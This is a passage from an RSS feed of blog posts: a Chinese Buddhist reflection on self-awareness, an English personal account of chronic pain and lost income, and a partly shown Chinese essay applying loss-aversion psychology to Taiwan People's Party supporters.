      <description>&lt;![CDATA[有一種人，選擇把燈打開。&#xA;&#xA;不是為了炫耀，不是為了讓自己顯得比別人更高。&#xA;而是因為她真的相信：看見，才有機會改變。&#xA;&#xA;這種人，並不輕鬆。&#xA;&#xA;---&#xA;&#xA;我收到的意象&#xA;&#xA;這幾天，我靜坐的時候，心裡浮現了一個畫面。&#xA;&#xA;一個人站在水邊，手裡拿著一盞燈。燈光照出了水裡的東西，有渾濁的，有漩渦，有腐壞，有在種子裡壞掉的味道。&#xA;&#xA;她照著照著，忘了看自己腳下的石頭是不是穩的。&#xA;&#xA;這不是責備。這是我在靜中收到的一個提醒，覺得有必要寫下來。&#xA;&#xA;  作惡的人，也需要有人替她看路。&#xA;&#xA;---&#xA;&#xA;藥師佛照見的，包括那個打燈的人&#xA;&#xA;《藥師琉璃光如來本願功德經》第四願說：&#xA;&#xA;「若諸有情，行邪道者，悉令安住菩提道中。」&#xA;&#xA;邪道，不只是做壞事的人走的路。有時候，是一個本意善良的人，在某一個彎道上走偏了，自己還不知道。&#xA;&#xA;憤怒是燃料，但燃料燒太久，會燒到自己。&#xA;看見別人的業障很清楚，但自己的業障，往往在背後。&#xA;&#xA;這不是任何人的錯。這是人的限制。&#xA;&#xA;---&#xA;&#xA;種子的事&#xA;&#xA;我想說的是種子。&#xA;&#xA;每一個字、每一個念、每一次選擇把某件事說出來——都是種子。好的種子會長，壞的種子也會長。&#xA;&#xA;打燈這件事，本身是好的種子。&#xA;但如果打燈的過程裡，夾帶了太多的恨、太多的想讓對方難受的心——那個部分，也是種子，也會長。&#xA;&#xA;  種子不挑種的人。它只認土，只認水，只認你給它的那份心。&#xA;&#xA;我在靜中看見的意象告訴我：那個站在水邊的人，她的種子大部分是好的。但有幾顆，需要她自己回頭看一看。&#xA;&#xA;---&#xA;&#xA;還來得及，這句話是給你說的&#xA;&#xA;原來那篇文章的最後，說「停下來，還來得及」，是說給您聽的。&#xA;&#xA;我今天想把這句話，還給那個寫下它的人。&#xA;&#xA;不是說你做錯了。是說：你也值得被人提醒。你也值得有人替你擔心你的種子。你也值得有人跟你說——&#xA;&#xA;慢下來，照顧一下自己腳下的路。&#xA;&#xA;業力不分好人壞人，只看心念的重量。一個做了很多好事的人，如果心裡一直背著憤怒和恐懼，那個重量，也是要還的。&#xA;&#xA;---&#xA;&#xA;我的祝念&#xA;&#xA;我沒有辦法替你清業。&#xA;我也不是任何神明的傳話人，我只是一個在靜中收到了一些意象、覺得應該寫下來的人。&#xA;&#xA;但我可以說：&#xA;&#xA;你做的事，有它的意義。你打開的燈，照見了一些真實的東西。這份願心，藥師佛看得見。&#xA;&#xA;只是，記得也讓人替你打一盞燈。&#xA;&#xA;「南無消災延壽藥師佛。」&#xA;&#xA;---&#xA;&#xA;願你的種子，長出你本來想要的那棵樹。&#xA;&#xA;  南無藥師琉璃光如來&#xA;&#xA;---&#xA;&#xA;#藥師佛 #因果 #警世]]&gt;</description>
      <content:encoded><![CDATA[<p>有一種人，選擇把燈打開。</p>

<p>不是為了炫耀，不是為了讓自己顯得比別人更高。
而是因為她真的相信：看見，才有機會改變。</p>

<p>這種人，並不輕鬆。</p>

<hr>

<h2 id="我收到的意象">我收到的意象</h2>

<p>這幾天，我靜坐的時候，心裡浮現了一個畫面。</p>

<p><img src="https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/374/799/129/440/229/original/c92f6fded80f0467.png" alt=""></p>

<p>一個人站在水邊，手裡拿著一盞燈。燈光照出了水裡的東西，有渾濁的，有漩渦，有腐壞，有在種子裡壞掉的味道。</p>

<p>她照著照著，忘了看自己腳下的石頭是不是穩的。</p>

<p>這不是責備。這是我在靜中收到的一個提醒，覺得有必要寫下來。</p>

<blockquote><p>作惡的人，也需要有人替她看路。</p></blockquote>

<hr>

<h2 id="藥師佛照見的-包括那個打燈的人">藥師佛照見的，包括那個打燈的人</h2>

<p>《藥師琉璃光如來本願功德經》第四願說：</p>

<p>「若諸有情，行邪道者，悉令安住菩提道中。」</p>

<p>邪道，不只是做壞事的人走的路。有時候，是一個本意善良的人，在某一個彎道上走偏了，自己還不知道。</p>

<p>憤怒是燃料，但燃料燒太久，會燒到自己。
看見別人的業障很清楚，但自己的業障，往往在背後。</p>

<p>這不是任何人的錯。這是人的限制。</p>

<hr>

<h2 id="種子的事">種子的事</h2>

<p>我想說的是種子。</p>

<p>每一個字、每一個念、每一次選擇把某件事說出來——都是種子。好的種子會長，壞的種子也會長。</p>

<p><img src="https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/374/799/129/440/229/original/c92f6fded80f0467.png" alt=""></p>

<p>打燈這件事，本身是好的種子。
但如果打燈的過程裡，夾帶了太多的恨、太多的想讓對方難受的心——那個部分，也是種子，也會長。</p>

<blockquote><p>種子不挑種的人。它只認土，只認水，只認你給它的那份心。</p></blockquote>

<p>我在靜中看見的意象告訴我：那個站在水邊的人，她的種子大部分是好的。但有幾顆，需要她自己回頭看一看。</p>

<hr>

<h2 id="還來得及-這句話是給你說的">還來得及，這句話是給你說的</h2>

<p>原來那篇文章的最後，說「停下來，還來得及」，是說給您聽的。</p>

<p>我今天想把這句話，還給那個寫下它的人。</p>

<p>不是說你做錯了。是說：你也值得被人提醒。你也值得有人替你擔心你的種子。你也值得有人跟你說——</p>

<p><strong>慢下來，照顧一下自己腳下的路。</strong></p>

<p>業力不分好人壞人，只看心念的重量。一個做了很多好事的人，如果心裡一直背著憤怒和恐懼，那個重量，也是要還的。</p>

<hr>

<h2 id="我的祝念">我的祝念</h2>

<p>我沒有辦法替你清業。
我也不是任何神明的傳話人，我只是一個在靜中收到了一些意象、覺得應該寫下來的人。</p>

<p>但我可以說：</p>

<p>你做的事，有它的意義。你打開的燈，照見了一些真實的東西。這份願心，藥師佛看得見。</p>

<p>只是，記得也讓人替你打一盞燈。</p>

<p><strong>「南無消災延壽藥師佛。」</strong></p>

<hr>

<p>願你的種子，長出你本來想要的那棵樹。</p>

<blockquote><p>南無藥師琉璃光如來</p></blockquote>

<hr>

<p>#藥師佛 #因果 #警世</p>
]]></content:encoded>
      <author>東方琉璃淨土</author>
      <guid>https://infosec.press/read/a/h8ou0sz2kj</guid>
      <pubDate>Thu, 09 Apr 2026 12:34:58 +0000</pubDate>
    </item>
    <item>
      <title>📝 I had forgotten how bad it gets</title>
      <link>https://infosec.press/brunomiguel/i-had-forgotten-how-bad-it-gets</link>
      <description>&lt;![CDATA[For over a year, with small periods of inactivity here and there, I had some paid work, writing and reviewing other people&#39;s writings, mostly the latter. This was the only thing I found I could do at my own pace, with no fixed schedule, whenever my lack of health allowed it. Although I didn&#39;t make a ton of money monthly, it allowed me to pay my medication, basic expenses, and the weed or weed derivative I used to keep the pain low enough so I could keep working for more than an hour a day. And, for a while, I had enough pain relief that I could almost feel a glimpse of normalcy, as long as I reduced my physical effort to a minimum.&#xA;&#xA;At some point, this made me think the good times would keep up, and I was no longer feeling like dead weight to everyone around me. Reality is a bitch, though, and doesn&#39;t care about anyone. Eventually, the work began to dry up. Every month, the amount of work decreased to the point I am today, with barely any paid work in the last three months.&#xA;&#xA;We have a saying here: &#34;no money, no vices&#34;. I had gotten used to a manageable level of pain (keep in mind that what I consider manageable is still a crazy amount of pain), and I had forgotten how bad it gets. I didn&#39;t forget this shit is awful, but I had forgotten exactly how painful it can get.&#xA;&#xA;Let me give you a fresh example: last Monday, at dinner, my fingers were hurting so much I could barely cut my own food.&#xA;&#xA;Now, I&#39;m back to literally burning my back just to get a small relief. I&#39;m not joking or exaggerating. Almost a week later, I still have blisters from putting a hot water bag directly on my back a few times per day. If I don&#39;t brute force the pain signals with other stuff, like the burning feeling, I can&#39;t get pain relief. This is what I suspect happens with the weed: the increase in serotonin production forces the brain to allocate more resources to it, leaving less for the pain signals.&#xA;&#xA;I&#39;m currently trying to find another work option, but it&#39;s not an easy thing to do when you have these constraints.&#xA;&#xA;#ChronicPain #Fibromyalgia #Ramblings #Pain]]&gt;</description>
      <content:encoded><![CDATA[<p>For over a year, with small periods of inactivity here and there, I had some paid work, writing and reviewing other people&#39;s writings, mostly the latter. This was the only thing I found I could do at my own pace, with no fixed schedule, whenever my lack of health allowed it. Although I didn&#39;t make a ton of money monthly, it allowed me to pay my medication, basic expenses, and the weed or weed derivative I used to keep the pain low enough so I could keep working for more than an hour a day. And, for a while, I had enough pain relief that I could almost feel a glimpse of normalcy, as long as I reduced my physical effort to a minimum.</p>

<p>At some point, this made me think the <em>good times</em> would keep up, and I was no longer feeling like dead weight to everyone around me. Reality is a bitch, though, and doesn&#39;t care about anyone. Eventually, the work began to dry up. Every month, the amount of work decreased to the point I am today, with barely any paid work in the last three months.</p>

<p>We have a saying here: “no money, no vices”. I had gotten used to a manageable level of pain (keep in mind that what I consider manageable is still a crazy amount of pain), and I had forgotten how bad it gets. I didn&#39;t forget this shit is awful, but I had forgotten exactly how painful it can get.</p>

<p>Let me give you a fresh example: last Monday, at dinner, my fingers were hurting so much I could barely cut my own food.</p>

<p>Now, I&#39;m back to literally burning my back just to get a small relief. I&#39;m not joking or exaggerating. Almost a week later, I still have blisters from putting a hot water bag directly on my back a few times per day. If I don&#39;t brute force the pain signals with other stuff, like the burning feeling, I can&#39;t get pain relief. This is what I suspect happens with the weed: the increase in serotonin production forces the brain to allocate more resources to it, leaving less for the pain signals.</p>

<p>I&#39;m currently trying to find another work option, but it&#39;s not an easy thing to do when you have these constraints.</p>

<p>#ChronicPain #Fibromyalgia #Ramblings #Pain</p>
]]></content:encoded>
      <author>Bruno&#39;s ramblings</author>
      <guid>https://infosec.press/read/a/5d4o82n250</guid>
      <pubDate>Wed, 08 Apr 2026 14:10:24 +0000</pubDate>
    </item>
    <item>
      <title>你明知道虧了，為什麼還是走不掉？：小草的損失厭惡困局</title>
      <link>https://infosec.press/dong-fang-liu-li-jing-tu/ni-ming-zhi-dao-kui-liao-wei-shi-mo-huan-shi-zou-bu-diao-xiao-cao-de-sun-shi-yan</link>
      <description>&lt;![CDATA[一個你不願正視的問題，一個你其實早就知道答案的問題。&#xA;&#xA;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/nUnkQJdYJRk?si=TQdVRoGVf2p2VxH2&#34; title=&#34;YouTube video player&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&#34; referrerpolicy=&#34;strict-origin-when-cross-origin&#34; allowfullscreen/iframe&#xA;!--more--&#xA;---&#xA;&#xA;目錄&#xA;&#xA;凱道的人們與一個古老的心理陷阱&#xA;民眾黨的帳面，已經是赤字了&#xA;損失厭惡：為什麼「輸了還在撐」不只是意志力問題&#xA;前景理論與康納曼的發現&#xA;政黨支持裡的「凹單」心理&#xA;轉換成本：為什麼離開民眾黨感覺這麼難&#xA;「沉沒成本」的詛咒：投入愈深，愈難回頭&#xA;你可以怎麼做&#xA;最後說一句話&#xA;&#xA;---&#xA;&#xA;凱道的人們與一個古老的心理陷阱div id=&#34;引言&#34;/div&#xA;&#xA;2026年3月29日，凱達格蘭大道來了一萬人。&#xA;&#xA;他們舉著旗子、喊著口號，為一個剛被一審判處17年有期徒刑的政治人物站台。柯文哲，這個曾經以「清廉、勤政、愛台灣」為號召的前台北市長，此刻正面對著京華城案的漫長法律戰。而他的支持者——那群被稱為「小草」的人們——仍然在風裡等待。&#xA;&#xA;我不打算在這裡評斷京華城案的法律對錯。我想問的是另一個問題：&#xA;&#xA;  那些清楚看到民眾黨出了嚴重問題的支持者，他們為什麼還在那裡？&#xA;&#xA;這不是挑釁，是一個真誠的心理學問題。因為同樣的模式，也出現在每一個賠錢不肯停損的散戶身上。它有一個正式的名字： 損失厭惡（Loss Aversion）。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;民眾黨的帳面，已經是赤字了div id=&#34;赤字&#34;/div&#xA;&#xA;讓我們先把帳算清楚。&#xA;&#xA;民眾黨最初吸引了大量中間選民，核心訴求是「超越藍綠」、「理性問政」、「打破政治對立文化」。這批選民投入了時間、感情、網路聲量，以及選票——換一個投資的說法，這就是他們的「mark買入成本/mark」。&#xA;&#xA;但這幾年發生了什麼？&#xA;&#xA;黨主席本人涉入刑案，從羈押到一審判決；黨的立法院表現多次被批評為配合國民黨進行程序杯葛；黨內的問政路線從「第三條路」逐漸滑向傳統藍營邏輯；更根本的是，「超越藍綠」這個當初最讓人動心的承諾，早已難以在日常政治操作中辨認。&#xA;&#xA;  對一個投資人來說，這就是標的「基本面惡化」。&#xA;&#xA;現在問題來了——如果你在2022年買進了一檔股票，理由是「它打破舊有格局」，而三年後它不只沒有打破什麼，創辦人還被司法纏身——你會不會承認自己看錯了，然後停損出場？&#xA;&#xA;大多數人不會。理由不是因為他們沒有看到數字，而是因為「損失的痛苦」已經把大腦的理性迴路蓋過去了。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;損失厭惡：為什麼「輸了還在撐」不只是意志力問題div id=&#34;損失厭惡&#34;/div&#xA;&#xA;損失厭惡（Loss Aversion）是行為經濟學最核心、也最反直覺的發現之一。&#xA;&#xA;它說的是：失去某樣東西所帶來的痛苦，在心理上大約是獲得同等事物所帶來的快樂的兩倍。&#xA;&#xA;換句話說，丟掉100元的難受，比撿到100元的開心更強烈——即便金額完全相同。&#xA;&#xA;這不是個性問題，也不是教育程度問題。它是人類大腦在演化過程中寫進去的底層程式。神經科學研究顯示，大腦的杏仁核（amygdala）——那個處理恐懼的區塊——在面對潛在損失時的反應，要比面對潛在獲益時更激烈、更優先。&#xA;&#xA;從演化的角度看，這完全合理：對遠古人類來說，錯失一次打獵機會頂多少吃一頓，但忽視一次天敵威脅可能當場死亡。「損失比獲益更危險」是刻進基因的邏輯。&#xA;&#xA;問題是，這個對生存極度有用的機制，在現代的政治選擇裡，常常讓人做出真正害自己的決定。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;前景理論與康納曼的發現div id=&#34;前景理論&#34;/div&#xA;&#xA;這個領域最重要的理論基礎，來自心理學家丹尼爾·康納曼（Daniel Kahneman）和艾默斯·特沃斯基（Amos Tversky）。他們在1979年提出了「前景理論」（Prospect Theory），後來成為康納曼獲得諾貝爾經濟學獎的核心貢獻。&#xA;&#xA;他們做了一個非常直觀的實驗：&#xA;&#xA;你有兩個選項——&#xA;&#xA;選項A：直接得到100元。&#xA;選項B：50%機率得到200元，50%機率什麼都沒有。&#xA;&#xA;期望值完全相同，大多數人選了A。&#xA;&#xA;現在換一個框架——&#xA;&#xA;選項A：確定損失100元。&#xA;選項B：50%機率損失200元，50%機率一分不損。&#xA;&#xA;大多數人這次選了B——選了賭博。&#xA;&#xA;這個對稱性令人吃驚。面對「可能的獲益」，人是風險趨避的（保守）；mark面對「確定的損失」，人反而變成了賭徒。/mark&#xA;&#xA;為什麼？&#xA;&#xA;  因為「確定損失100元」這件事觸發的痛苦，大到讓人情願去賭一個可能讓情況更糟的結果——只要那個結果不是「確定的失去」。&#xA;&#xA;這個心理，在選舉政治裡也完全成立。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;政黨支持裡的「凹單」心理div id=&#34;凹單&#34;/div&#xA;&#xA;股市裡有個詞叫「凹單」——就是明知道一檔股票已經基本面惡化，卻硬撐著不停損，寄望它有一天會回來。&#xA;&#xA;行為金融學把這個現象稱為「處置效應」（Disposition Effect）：人們傾向於太快賣掉賺錢的股票，卻死抱著賠錢的股票。&#xA;&#xA;背後的心理邏輯是：只要不賣，就沒有「真正賠錢」。帳面上的虧損還不是實現的損失，還有回本的可能。賣了，才是真的承認看錯了。&#xA;&#xA;把這個邏輯套回政治支持，幾乎是完美的對應——&#xA;&#xA;  「民眾黨現在有問題，但我等它回來。」&#xA;&#xA;  「現在離開，等於承認我當初的選擇是錯的。」&#xA;&#xA;  「我不想讓那些說民眾黨沒用的人得意。」&#xA;&#xA;最後這一點尤其要命。承認自己支持的政黨走偏了，在社交層面意味著「公開認輸」。而失去社會認可，和失去金錢一樣，都會觸發損失厭惡的機制。&#xA;&#xA;所以人們繼續撐著——不是因為他們相信基本面還好，而是因為「停損」的痛苦，在這個當下比「繼續持有」更難承受。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;轉換成本：為什麼離開民眾黨感覺這麼難div id=&#34;轉換成本&#34;/div&#xA;&#xA;在投資領域，轉換成本（Switching Cost）是指從一個標的換到另一個標的，所需要付出的代價——除了金錢，還有時間、資訊重建、以及心理上的「放棄熟悉的東西」。&#xA;&#xA;在政治裡，轉換成本更高，也更不透明。&#xA;&#xA;一個長期支持民眾黨的選民，如果要「換邊」，他面對的代價包括：&#xA;&#xA;身份認同的損失。 「小草」這個標籤，已經成了一種社群歸屬。放棄支持，等於放棄這個圈子的認同與連結。&#xA;&#xA;過去投入的否定。 一個人如果花了三年在網路上為柯文哲辯護，寫了幾百則留言、轉發了幾百篇文章——現在承認這一切是場誤判，等於把那三年的時間都宣判為「虧損」。&#xA;&#xA;對立面的壓力。 台灣的政治文化裡，「棄守」某個政黨常常被理解為「投向對方陣營」。對一個無法接受藍綠框架的選民來說，「離開民眾黨」在感覺上等於「沒有地方可以去」。&#xA;&#xA;這三個轉換成本疊加在一起，會讓「繼續留著」這個選項，在感知上比實際上理性得多。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;「沉沒成本」的詛咒：投入愈深，愈難回頭div id=&#34;沉沒成本&#34;/div&#xA;&#xA;和轉換成本相關但又不同的，是「沉沒成本謬誤」（Sunk Cost Fallacy）。&#xA;&#xA;沉沒成本是已經發生、無法回收的投入。理性上，沉沒成本不應該影響未來的決策——過去的錢已經花了，不管現在怎麼選，都拿不回來。&#xA;&#xA;但人類天生不是這樣思考的。&#xA;&#xA;當一個人在一件事上投入的時間、情感、金錢愈多，他就愈難放棄。不是因為那件事的基本面變好了，而是因為「放棄」所代表的損失，在心裡和所有那些投入加在一起，顯得太過沉重。&#xA;&#xA;這也是為什麼一個對民眾黨死忠了六年的支持者，比一個剛加入的人更難出走。不是因為他更清楚黨的內部運作，而是因為他投入的沉沒成本更高，放棄等於要親手否定更多年份的自己。&#xA;&#xA;行為經濟學家把這叫做「endowment effect」（稟賦效應）——我們傾向於把已經擁有的東西估值得比實際更高，僅僅因為它是「我們的」。一個人對自己支持的政黨的信念，也會因為「它是我的選擇」這件事，而在心裡被估值得過高。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;你可以怎麼做div id=&#34;怎麼做&#34;/div&#xA;&#xA;這篇文章不是要說誰對誰錯，也不是要告訴你「你應該去支持誰」。&#xA;&#xA;它要說的是：如果你是一個曾經相信民眾黨、但現在感受到認知和現實之間有落差的人&#xA;&#xA;  那個讓你繼續撐著的力量，很可能不是理性，而是損失厭惡。&#xA;&#xA;而損失厭惡是可以被意識到、並部分克服的。以下是幾個具體的方法：&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;第一步：把帳算清楚&#xA;&#xA;問自己：當初支持民眾黨的理由是什麼？那個理由，現在還存在嗎？&#xA;&#xA;不要問「他們還是比較好」，問「當初讓我動心的那件事，現在還成立嗎」。&#xA;&#xA;如果答案是否定的，那你的支持已經是一種慣性，不是一種選擇。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;第二步：把沉沒成本和未來切開&#xA;&#xA;過去三年你投入的時間和感情，無論你現在怎麼選，都回不來了。&#xA;&#xA;承認看錯了，不會讓那三年消失。但繼續撐著，可能會讓接下來的三年也一起賠進去。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;第三步：把損失重新定義&#xA;&#xA;損失厭惡讓人把「離開」感知為損失。但換個角度——如果一個投資人繼續持有一檔基本面惡化的標的，他真正的損失是什麼？是他繼續沒有拿到的那些回報，是他本可以轉到更好地方的機會成本。&#xA;&#xA;「留著」本身，也是一種代價。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;第四步：允許「暫時沒有答案」&#xA;&#xA;台灣政治的困境之一，是讓很多人覺得「離開民眾黨」等於「必須立刻有個去處」。&#xA;&#xA;但事實上，你可以先停止支持一個令你失望的政黨，而不必立刻找到一個完美的替代品。&#xA;&#xA;在投資裡，這叫「先停損，再找標的」。&#xA;&#xA;在政治裡，也可以這樣。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;最後說一句話div id=&#34;最後&#34;/div&#xA;&#xA;損失厭惡是人類最普遍的認知偏誤之一。它沒有藍綠之分，也沒有小草與側翼之分。每個人，在某個時刻，都曾經因為不想承認損失，而讓損失繼續擴大。&#xA;&#xA;但心理學的研究同時也告訴我們：損失厭惡不是命運。它是一個可以被識別、可以被命名、因此可以被部分克服的東西。&#xA;&#xA;識別它，是第一步。&#xA;&#xA;那些站在凱道上的人，他們的情感是真實的。他們的失望也是真實的。他們對台灣政治的期待，從一開始就是真實的。&#xA;&#xA;  但情感的真實，和判斷的正確，是兩件不同的事。&#xA;&#xA;如果你真的關心這個國家的走向，你值得用一個更清醒的眼光，去評估你手上的這張票，它現在換來的是什麼。&#xA;&#xA;small回到頁首/small&#xA;&#xA;---&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>一個你不願正視的問題，<strong>一個你其實早就知道答案的問題。</strong></p>

<p><iframe width="560" height="315" src="https://www.youtube.com/embed/nUnkQJdYJRk?si=TQdVRoGVf2p2VxH2" title="YouTube video player" frameborder="0" allowfullscreen=""></iframe>
</p>

<hr>

<h3 id="目錄">目錄</h3>

<p><a href="#%E5%BC%95%E8%A8%80" rel="nofollow">凱道的人們與一個古老的心理陷阱</a>
<a href="#%E8%B5%A4%E5%AD%97" rel="nofollow">民眾黨的帳面，已經是赤字了</a>
<a href="#%E6%90%8D%E5%A4%B1%E5%8E%AD%E6%83%A1" rel="nofollow">損失厭惡：為什麼「輸了還在撐」不只是意志力問題</a>
<a href="#%E5%89%8D%E6%99%AF%E7%90%86%E8%AB%96" rel="nofollow">前景理論與康納曼的發現</a>
<a href="#%E5%87%B9%E5%96%AE" rel="nofollow">政黨支持裡的「凹單」心理</a>
<a href="#%E8%BD%89%E6%8F%9B%E6%88%90%E6%9C%AC" rel="nofollow">轉換成本：為什麼離開民眾黨感覺這麼難</a>
<a href="#%E6%B2%89%E6%B2%92%E6%88%90%E6%9C%AC" rel="nofollow">「沉沒成本」的詛咒：投入愈深，愈難回頭</a>
<a href="#%E6%80%8E%E9%BA%BC%E5%81%9A" rel="nofollow">你可以怎麼做</a>
<a href="#%E6%9C%80%E5%BE%8C" rel="nofollow">最後說一句話</a></p>

<hr>

<h2 id="凱道的人們與一個古老的心理陷阱-div-id-引言-div">凱道的人們與一個古老的心理陷阱<div id="引言"></div></h2>

<p>2026年3月29日，凱達格蘭大道來了一萬人。</p>

<p>他們舉著旗子、喊著口號，為一個剛被一審判處17年有期徒刑的政治人物站台。柯文哲，這個曾經以「清廉、勤政、愛台灣」為號召的前台北市長，此刻正面對著京華城案的漫長法律戰。而他的支持者——那群被稱為「小草」的人們——仍然在風裡等待。</p>

<p>我不打算在這裡評斷京華城案的法律對錯。我想問的是另一個問題：</p>

<blockquote><p>那些清楚看到民眾黨出了嚴重問題的支持者，他們為什麼還在那裡？</p></blockquote>

<p>這不是挑釁，是一個真誠的心理學問題。因為同樣的模式，也出現在每一個賠錢不肯停損的散戶身上。它有一個正式的名字： <strong>損失厭惡（Loss Aversion）</strong>。</p>

<p><small><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="民眾黨的帳面-已經是赤字了-div-id-赤字-div">民眾黨的帳面，已經是赤字了<div id="赤字"></div></h2>

<p>讓我們先把帳算清楚。</p>

<p>民眾黨最初吸引了大量中間選民，<strong>核心訴求是「超越藍綠」、「理性問政」、「打破政治對立文化」</strong>。這批選民投入了時間、感情、網路聲量，以及選票——換一個投資的說法，這就是他們的「<mark>買入成本</mark>」。</p>

<p>但這幾年發生了什麼？</p>

<p>黨主席本人涉入刑案，從羈押到一審判決；黨的立法院表現多次被批評為配合國民黨進行程序杯葛；黨內的問政路線從「第三條路」<strong>逐漸滑向傳統藍營邏輯</strong>；更根本的是，「超越藍綠」這個當初最讓人動心的承諾，早已難以在日常政治操作中辨認。</p>

<blockquote><p>對一個投資人來說，這就是標的「基本面惡化」。</p></blockquote>

<p>現在問題來了——如果你在2022年買進了一檔股票，理由是「它打破舊有格局」，而<strong>三年後它不只沒有打破什麼，創辦人還被司法纏身</strong>——你會不會承認自己看錯了，然後停損出場？</p>

<p>大多數人不會。理由不是因為他們沒有看到數字，而是因為「損失的痛苦」已經把大腦的理性迴路蓋過去了。</p>

<p><small><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="損失厭惡-為什麼-輸了還在撐-不只是意志力問題-div-id-損失厭惡-div">損失厭惡：為什麼「輸了還在撐」不只是意志力問題<div id="損失厭惡"></div></h2>

<p>損失厭惡（Loss Aversion）是行為經濟學最核心、也最反直覺的發現之一。</p>

<p>它說的是：<strong>失去某樣東西所帶來的痛苦，在心理上大約是獲得同等事物所帶來的快樂的兩倍</strong>。</p>

<p>換句話說，丟掉100元的難受，比撿到100元的開心更強烈——即便金額完全相同。</p>

<p>這不是個性問題，也不是教育程度問題。它是人類大腦在演化過程中寫進去的底層程式。神經科學研究顯示，大腦的杏仁核（amygdala）——那個處理恐懼的區塊——在面對潛在損失時的反應，要比面對潛在獲益時更激烈、更優先。</p>

<p>從演化的角度看，這完全合理：對遠古人類來說，錯失一次打獵機會頂多少吃一頓，但忽視一次天敵威脅可能當場死亡。「損失比獲益更危險」是刻進基因的邏輯。</p>

<p>問題是，這個對生存極度有用的機制，在現代的政治選擇裡，常常讓人做出真正害自己的決定。</p>

<p><small><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="前景理論與康納曼的發現-div-id-前景理論-div">前景理論與康納曼的發現<div id="前景理論"></div></h2>

<p>這個領域最重要的理論基礎，來自心理學家丹尼爾·康納曼（Daniel Kahneman）和艾默斯·特沃斯基（Amos Tversky）。他們在1979年提出了「前景理論」（Prospect Theory），後來成為康納曼獲得諾貝爾經濟學獎的核心貢獻。</p>

<p>他們做了一個非常直觀的實驗：</p>

<p>你有兩個選項——</p>

<p><strong>選項A</strong>：直接得到100元。
<strong>選項B</strong>：50%機率得到200元，50%機率什麼都沒有。</p>

<p>期望值完全相同，大多數人選了A。</p>

<p>現在換一個框架——</p>

<p><strong>選項A</strong>：確定損失100元。
<strong>選項B</strong>：50%機率損失200元，50%機率一分不損。</p>

<p>大多數人這次選了B——選了賭博。</p>

<p>這個對稱性令人吃驚。面對「可能的獲益」，人是風險趨避的（保守）；<mark>面對「確定的損失」，人反而變成了賭徒。</mark></p>

<p>為什麼？</p>

<blockquote><p>因為「確定損失100元」這件事觸發的痛苦，大到讓人情願去賭一個可能讓情況更糟的結果——只要那個結果不是「確定的失去」。</p></blockquote>

<p>這個心理，在選舉政治裡也完全成立。</p>

<p><small><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="政黨支持裡的-凹單-心理-div-id-凹單-div">政黨支持裡的「凹單」心理<div id="凹單"></div></h2>

<p>股市裡有個詞叫「凹單」——就是明知道一檔股票已經基本面惡化，卻硬撐著不停損，寄望它有一天會回來。</p>

<p>行為金融學把這個現象稱為「處置效應」（Disposition Effect）：人們傾向於太快賣掉賺錢的股票，卻死抱著賠錢的股票。</p>

<p>背後的心理邏輯是：只要不賣，就沒有「真正賠錢」。帳面上的虧損還不是實現的損失，還有回本的可能。賣了，才是真的承認看錯了。</p>

<p>把這個邏輯套回政治支持，幾乎是完美的對應——</p>

<blockquote><p>「民眾黨現在有問題，但我等它回來。」</p>

<p>「現在離開，等於承認我當初的選擇是錯的。」</p>

<p>「我不想讓那些說民眾黨沒用的人得意。」</p></blockquote>

<p>最後這一點尤其要命。承認自己支持的政黨走偏了，在社交層面意味著「<strong>公開認輸</strong>」。而失去社會認可，和失去金錢一樣，都會觸發損失厭惡的機制。</p>

<p>所以人們繼續撐著——不是因為他們相信基本面還好，而是因為「停損」的痛苦，在這個當下比「繼續持有」更難承受。</p>

<p><small><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="轉換成本-為什麼離開民眾黨感覺這麼難-div-id-轉換成本-div">轉換成本：為什麼離開民眾黨感覺這麼難<div id="轉換成本"></div></h2>

<p>在投資領域，轉換成本（Switching Cost）是指從一個標的換到另一個標的，所需要付出的代價——除了金錢，還有時間、資訊重建、以及心理上的「放棄熟悉的東西」。</p>

<p>在政治裡，轉換成本更高，也更不透明。</p>

<p>一個長期支持民眾黨的選民，如果要「換邊」，他面對的代價包括：</p>

<p><strong>身份認同的損失。</strong> 「小草」這個標籤，已經成了一種社群歸屬。放棄支持，等於放棄這個圈子的認同與連結。</p>

<p><strong>過去投入的否定。</strong> 一個人如果花了三年在網路上為柯文哲辯護，寫了幾百則留言、轉發了幾百篇文章——現在承認這一切是場誤判，等於把那三年的時間都宣判為「虧損」。</p>

<p><strong>對立面的壓力。</strong> 台灣的政治文化裡，「棄守」某個政黨常常被理解為「投向對方陣營」。對一個無法接受藍綠框架的選民來說，「離開民眾黨」在感覺上等於「沒有地方可以去」。</p>

<p>這三個轉換成本疊加在一起，會讓「繼續留著」這個選項，在感知上比實際上理性得多。</p>

<p><small><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回到目錄</a></small></p>

<hr>

